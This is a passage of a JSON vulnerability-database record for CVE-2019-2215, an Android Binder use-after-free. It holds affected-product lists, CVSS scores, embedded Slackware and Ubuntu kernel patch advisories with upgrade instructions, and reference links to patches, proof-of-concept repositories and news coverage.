        "version": "10.0.0.170\\(c01e170r1p4\\)"
      },
      {
        "model": "y9 2019",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.297\\(c605e4r1p1t8\\)"
      },
      {
        "model": "leland-l21a",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.156\\(c185e5r1p5t8\\)"
      },
      {
        "model": "fas2720",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "p20",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.312\\(c00e312r1p1t8\\)"
      },
      {
        "model": "a220",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "barca-al00",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "8.0.0.377\\(c00\\)"
      },
      {
        "model": "leland-l32a",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.153\\(c675e6r1p4t8\\)"
      },
      {
        "model": "solidfire",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "h300s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "neo-al00d",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.321\\(c786e320r1p1t8\\)"
      },
      {
        "model": "stanford-l09s",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "huawei",
        "version": "9.1.0.210\\(c432e2r1p5t8\\)"
      },
      {
        "model": "aff baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "android",
        "scope": null,
        "trust": 0.8,
        "vendor": "google",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-2215"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:google:android",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "155309"
      },
      {
        "db": "PACKETSTORM",
        "id": "155335"
      }
    ],
    "trust": 0.2
  },
  "cve": "CVE-2019-2215",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CVE-2019-2215",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.9,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "id": "CVE-2019-2215",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 2.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-2215",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2019-2215",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
            "id": "CVE-2019-2215",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2019-2215",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201910-198",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-2215",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-2215"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-198"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-2215"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-2215"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.Product: AndroidAndroid ID: A-141720095. Android Contains a vulnerability in the use of freed memory. This vulnerability Android ID: A-141720095 It is published asInformation is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n[slackware-security]  Slackware 14.2 kernel (SSA:2019-311-01)\n\nNew kernel packages are available for Slackware 14.2 to fix security issues. \n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n+--------------------------+\npatches/packages/linux-4.4.199/*:  Upgraded. \n  These updates fix various bugs and security issues. \n  Be sure to upgrade your initrd after upgrading the kernel packages. \n  If you use lilo to boot your machine, be sure lilo.conf points to the correct\n  kernel and initrd and run lilo as root to update the bootloader. \n  If you use elilo to boot your machine, you should run eliloconfig to copy the\n  kernel and initrd to the EFI System Partition. \n  For more information, see:\n    Fixed in 4.4.191:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15118\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10906\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10905\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10638\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15117\n    Fixed in 4.4.193:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14835\n    Fixed in 4.4.194:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14816\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14814\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15505\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14821\n    Fixed in 4.4.195:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17053\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17052\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17056\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17055\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17054\n    Fixed in 4.4.196:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2215\n    Fixed in 4.4.197:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16746\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20976\n    Fixed in 4.4.198:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17075\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17133\n    Fixed in 4.4.199:\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15098\n  (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-generic-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199_smp-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-huge-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-i586-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-modules-smp-4.4.199_smp-i686-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199_smp-noarch-1.txz\n\nUpdated packages for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-generic-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-headers-4.4.199-x86-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-huge-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-modules-4.4.199-x86_64-1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/linux-4.4.199/kernel-source-4.4.199-noarch-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 14.2 packages:\n\n0e523f42e759ecc2399f36e37672f110  kernel-generic-4.4.199-i586-1.txz\nee6451f5362008b46fee2e08e3077b21  kernel-generic-smp-4.4.199_smp-i686-1.txz\na8338ef88f2e3ea9c74d564c36ccd420  kernel-headers-4.4.199_smp-x86-1.txz\ncd9e9c241e4eec2fba1dae658a28870e  kernel-huge-4.4.199-i586-1.txz\n842030890a424023817d42a83a86a7f4  kernel-huge-smp-4.4.199_smp-i686-1.txz\n257db024bb4501548ac9118dbd2d9ae6  kernel-modules-4.4.199-i586-1.txz\n96377cbaf7bca55aaca70358c63151a7  kernel-modules-smp-4.4.199_smp-i686-1.txz\n0673e86466f9e624964d95107cf6712f  kernel-source-4.4.199_smp-noarch-1.txz\n\nSlackware x86_64 14.2 packages:\n6d1ff428e7cad6caa8860acc402447a1  kernel-generic-4.4.199-x86_64-1.txz\ndadc091dc725b8227e0d1e35098d6416  kernel-headers-4.4.199-x86-1.txz\nf5f4c034203f44dd1513ad3504c42515  kernel-huge-4.4.199-x86_64-1.txz\na5337cd8b2ca80d4d93b9e9688e42b03  kernel-modules-4.4.199-x86_64-1.txz\n5dd6e46c04f37b97062dc9e52cc38add  kernel-source-4.4.199-noarch-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the packages as root:\n# upgradepkg kernel-*.txz\n\nIf you are using an initrd, you\u0027ll need to rebuild it. \n\nFor a 32-bit SMP machine, use this command (substitute the appropriate\nkernel version if you are not running Slackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199-smp | bash\n\nFor a 64-bit machine, or a 32-bit uniprocessor machine, use this command\n(substitute the appropriate kernel version if you are not running\nSlackware 14.2):\n# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 4.4.199 | bash\n\nPlease note that \"uniprocessor\" has to do with the kernel you are running,\nnot with the CPU. Most systems should run the SMP kernel (if they can)\nregardless of the number of cores the CPU has. If you aren\u0027t sure which\nkernel you are running, run \"uname -a\". If you see SMP there, you are\nrunning the SMP kernel and should use the 4.4.199-smp version when running\nmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit\nsystems should always use 4.4.199 as the version. \n\nIf you are using lilo or elilo to boot the machine, you\u0027ll need to ensure\nthat the machine is properly prepared before rebooting. \n\nIf using LILO:\nBy default, lilo.conf contains an image= line that references a symlink\nthat always points to the correct kernel. No editing should be required\nunless your machine uses a custom lilo.conf. If that is the case, be sure\nthat the image= line references the correct kernel file.  Either way,\nyou\u0027ll need to run \"lilo\" as root to reinstall the boot loader. \n\nIf using elilo:\nEnsure that the /boot/vmlinuz symlink is pointing to the kernel you wish\nto use, and then run eliloconfig to update the EFI System Partition. \n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list:                          |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message:                                                     |\n|                                                                        |\n|   unsubscribe slackware-security                                       |\n|                                                                        |\n| You will get a confirmation message back containing instructions to    |\n| complete the process.  Please do not reply to this email address.      |\n+------------------------------------------------------------------------+\n-----BEGIN PGP SIGNATURE-----\n\niEYEARECAAYFAl3Ej4wACgkQakRjwEAQIjPBGgCbBvQSowDI1fl2+9FnjAuXifIV\nqp4AoIBHeQ0arALUOqrVAfv+sZvRsiwu\n=/1NF\n-----END PGP SIGNATURE-----\n. ==========================================================================\nUbuntu Security Notice USN-4186-3\nNovember 13, 2019\n\nlinux vulnerability\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. It was discovered\nthat the kernel fix for CVE-2019-0155 (i915 missing Blitter Command\nStreamer check) was incomplete on 64-bit Intel x86 systems. This\nupdate addresses the issue. \n\nWe apologize for the inconvenience. \n\nOriginal advisory details:\n\n Stephan van Schaik, Alyssa Milburn, Sebastian \\xd6sterlund, Pietro Frigo,\n Kaveh Razavi, Herbert Bos, Cristiano Giuffrida, Giorgi Maisuradze, Moritz\n Lipp, Michael Schwarz, Daniel Gruss, and Jo Van Bulck discovered that Intel\n processors using Transactional Synchronization Extensions (TSX) could\n expose memory contents previously stored in microarchitectural buffers to a\n malicious process that is executing on the same CPU core. A local attacker\n could use this to expose sensitive information. (CVE-2019-11135)\n\n It was discovered that the Intel i915 graphics chipsets allowed userspace\n to modify page table entries via writes to MMIO from the Blitter Command\n Streamer and expose kernel memory information. A local attacker could use\n this to expose sensitive information or possibly elevate privileges. \n (CVE-2019-0155)\n\n Deepak Gupta discovered that on certain Intel processors, the Linux kernel\n did not properly perform invalidation on page table updates by virtual\n guest operating systems. A local attacker in a guest VM could use this to\n cause a denial of service (host system crash). (CVE-2018-12207)\n\n It was discovered that the Intel i915 graphics chipsets could cause a\n system hang when userspace performed a read from GT memory mapped input\n output (MMIO) when the product is in certain low power states. A local\n attacker could use this to cause a denial of service. (CVE-2019-0154)\n\n Hui Peng discovered that the Atheros AR6004 USB Wi-Fi device driver for the\n Linux kernel did not properly validate endpoint descriptors returned by the\n device. A physically proximate attacker could use this to cause a denial of\n service (system crash). (CVE-2019-15098)\n\n It was discovered that a buffer overflow existed in the 802.11 Wi-Fi\n configuration interface for the Linux kernel when handling beacon settings. \n A local attacker could use this to cause a denial of service (system crash)\n or possibly execute arbitrary code. (CVE-2019-16746)\n\n Ori Nimron discovered that the AX25 network protocol implementation in the\n Linux kernel did not properly perform permissions checks. A local attacker\n could use this to create a raw socket. (CVE-2019-17052)\n\n Ori Nimron discovered that the IEEE 802.15.4 Low-Rate Wireless network\n protocol implementation in the Linux kernel did not properly perform\n permissions checks. A local attacker could use this to create a raw socket. \n (CVE-2019-17053)\n\n Ori Nimron discovered that the Appletalk network protocol implementation in\n the Linux kernel did not properly perform permissions checks. A local\n attacker could use this to create a raw socket. (CVE-2019-17054)\n\n Ori Nimron discovered that the modular ISDN network protocol implementation\n in the Linux kernel did not properly perform permissions checks. A local\n attacker could use this to create a raw socket. (CVE-2019-17055)\n\n Ori Nimron discovered that the Near field Communication (NFC) network\n protocol implementation in the Linux kernel did not properly perform\n permissions checks. A local attacker could use this to create a raw socket. \n (CVE-2019-17056)\n\n Nico Waisman discovered that a buffer overflow existed in the Realtek Wi-Fi\n driver for the Linux kernel when handling Notice of Absence frames. A\n physically proximate attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2019-17666)\n\n Maddie Stone discovered that the Binder IPC Driver implementation in the\n Linux kernel contained a use-after-free vulnerability. A local attacker\n could use this to cause a denial of service (system crash) or possibly\n execute arbitrary code. (CVE-2019-2215)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n  linux-image-4.4.0-169-generic   4.4.0-169.198\n  linux-image-4.4.0-169-generic-lpae  4.4.0-169.198\n  linux-image-4.4.0-169-lowlatency  4.4.0-169.198\n  linux-image-generic             4.4.0.169.177\n  linux-image-generic-lpae        4.4.0.169.177\n  linux-image-lowlatency          4.4.0.169.177\n  linux-image-virtual             4.4.0.169.177\n\nPlease note that mitigating the TSX (CVE-2019-11135) and i915\n(CVE-2019-0154) issues requires corresponding microcode and graphics\nfirmware updates respectively. \n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4186-3\n  https://usn.ubuntu.com/4186-1\n  CVE-2019-0155, https://bugs.launchpad.net/bugs/1852141\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux/4.4.0-169.198\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-2215"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-2215"
      },
      {
        "db": "PACKETSTORM",
        "id": "155309"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "155335"
      }
    ],
    "trust": 1.98
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=47463",
        "trust": 0.2,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-2215"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-2215",
        "trust": 2.8
      },
      {
        "db": "PACKETSTORM",
        "id": "154911",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156495",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155212",
        "trust": 1.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672",
        "trust": 0.8
      },
      {
        "db": "EXPLOIT-DB",
        "id": "47463",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155309",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "155335",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "154730",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "48129",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.4271",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0200",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0766",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-198",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-2215",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-2215"
      },
      {
        "db": "PACKETSTORM",
        "id": "155309"
      },
      {
        "db": "PACKETSTORM",
        "id": "155212"
      },
      {
        "db": "PACKETSTORM",
        "id": "155335"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-198"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-2215"
      }
    ]
  },
  "id": "VAR-201910-0902",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.4434879933333333
  },
  "last_update_date": "2025-11-18T12:23:03.833000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-October 2019",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2019-10-01"
      },
      {
        "title": "Android Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113604"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-kvm vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4186-1"
      },
      {
        "title": "Huawei Security Advisories: Security Advisory - Use-after-free Vulnerability in Android Kernel",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=huawei_security_advisories\u0026qid=1133478f2f2ad2f8395bfcd7f09871d7"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-4186-3"
      },
      {
        "title": "cve-2019-2215",
        "trust": 0.1,
        "url": "https://github.com/kangtastic/cve-2019-2215 "
      },
      {
        "title": "CVE-2019-2215",
        "trust": 0.1,
        "url": "https://github.com/timwr/CVE-2019-2215 "
      },
      {
        "title": "qu1ckr00t",
        "trust": 0.1,
        "url": "https://github.com/grant-h/qu1ckr00t "
      },
      {
        "title": "CVE-2019-2215",
        "trust": 0.1,
        "url": "https://github.com/soryecker/CVE-2019-2215 "
      },
      {
        "title": "CVE-2019-2215",
        "trust": 0.1,
        "url": "https://github.com/marcinguy/CVE-2019-2215 "
      },
      {
        "title": "CVE-2019-2215",
        "trust": 0.1,
        "url": "https://github.com/mufidmb38/CVE-2019-2215 "
      },
      {
        "title": "Umass-CS-590J-Capstone-Project",
        "trust": 0.1,
        "url": "https://github.com/aguerriero1998/Umass-CS-590J-Capstone-Project "
      },
      {
        "title": "AndroidKernelVulnerability",
        "trust": 0.1,
        "url": "https://github.com/sharif-dev/AndroidKernelVulnerability "
      },
      {
        "title": "cve-2019-2215",
        "trust": 0.1,
        "url": "https://github.com/DimitriFourny/cve-2019-2215 "
      },
      {
        "title": "android-kernel-exploitation-ashfaq-CVE-2019-2215",
        "trust": 0.1,
        "url": "https://github.com/c0n71nu3/android-kernel-exploitation-ashfaq-CVE-2019-2215 "
      },
      {
        "title": "awesome-netsec-articles",
        "trust": 0.1,
        "url": "https://github.com/pengusec/awesome-netsec-articles "
      },
      {
        "title": "panopticon-Sidewinder",
        "trust": 0.1,
        "url": "https://github.com/Panopticon-Project/panopticon-Sidewinder "
      },
      {
        "title": "CVE-2019-2215",
        "trust": 0.1,
        "url": "https://github.com/c3r34lk1ll3r/CVE-2019-2215 "
      },
      {
        "title": "android_device_sharp_sh8996",
        "trust": 0.1,
        "url": "https://github.com/saga0324/android_device_sharp_sh8996 "
      },
      {
        "title": "CVE-2019-2215",
        "trust": 0.1,
        "url": "https://github.com/addhaloka/CVE-2019-2215 "
      },
      {
        "title": "Vulnerability-engine",
        "trust": 0.1,
        "url": "https://github.com/tdcoming/Vulnerability-engine "
      },
      {
        "title": "poc-exp",
        "trust": 0.1,
        "url": "https://github.com/msr00t/poc-exp "
      },
      {
        "title": "poc--exp",
        "trust": 0.1,
        "url": "https://github.com/HacTF/poc--exp "
      },
      {
        "title": "linux-kernel-exploitation",
        "trust": 0.1,
        "url": "https://github.com/vahalen/linux-kernel-exploitation "
      },
      {
        "title": "linux-kernel-exploitation",
        "trust": 0.1,
        "url": "https://github.com/TamilHackz/linux-kernel-exploitation "
      },
      {
        "title": "android-security",
        "trust": 0.1,
        "url": "https://github.com/alphaSeclab/android-security "
      },
      {
        "title": "sec-daily-2019",
        "trust": 0.1,
        "url": "https://github.com/alphaSeclab/sec-daily-2019 "
      },
      {
        "title": "PoC-in-GitHub",
        "trust": 0.1,
        "url": "https://github.com/developer3000S/PoC-in-GitHub "
      },
      {
        "title": "PoC-in-GitHub",
        "trust": 0.1,
        "url": "https://github.com/hectorgie/PoC-in-GitHub "
      },
      {
        "title": "CVE-POC",
        "trust": 0.1,
        "url": "https://github.com/0xT11/CVE-POC "
      },
      {
        "title": "PoC-in-GitHub",
        "trust": 0.1,
        "url": "https://github.com/nomi-sec/PoC-in-GitHub "
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/android-bugs-exploited-wild/166347/"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/sidewinder-apt-nepal-afghanistan-spy-campaign/162086/"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/brisk-private-trade-zero-days/154502/"
      },
      {
        "title": "The Register",
        "trust": 0.1,
        "url": "https://www.theregister.co.uk/2020/01/07/nasty_google_play_apps/"
      },
      {
        "title": "The Register",
        "trust": 0.1,
        "url": "https://www.theregister.co.uk/2019/11/23/security_roundup_nov22/"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/google-october-android-security-update/148964/"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/google-warns-of-zero-day/148924/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-2215"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201910-198"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-416",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-010672"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-2215"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4186-1/"
      },
      {
        "trust": 1.7,
        "url": "https://source.android.com/security/bulletin/2019-10-01"
      },
      {
